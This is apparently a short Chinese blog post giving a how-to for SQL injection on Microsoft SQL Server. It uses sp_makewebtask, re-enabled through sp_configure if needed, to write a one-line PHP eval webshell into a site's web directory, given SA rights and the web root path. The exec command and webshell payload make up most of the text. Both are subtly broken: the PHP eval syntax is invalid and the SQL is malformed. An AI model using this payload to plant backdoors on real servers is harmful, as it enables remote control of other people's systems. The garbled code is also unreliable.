在MSSQL下通过sp_makewebtask注入上传一句话

过sp_makewebtask注入传马

前提:1、拥有SA权限 2、知道WEB站点物理路径

MSSQL有可能阻止WebAssistant Procedures对sp_makewebtask的访问

可以通过sp_configure重新开启

 

sp_makewebtask
将咨询语句写入文件中

exec sp_makewebtask ‘web目录’,SELECT <?php $eval(POST_[“a”]); ?> ;–

 

点赞

发表评论

电子邮件地址不会被公开。 必填项已用*标注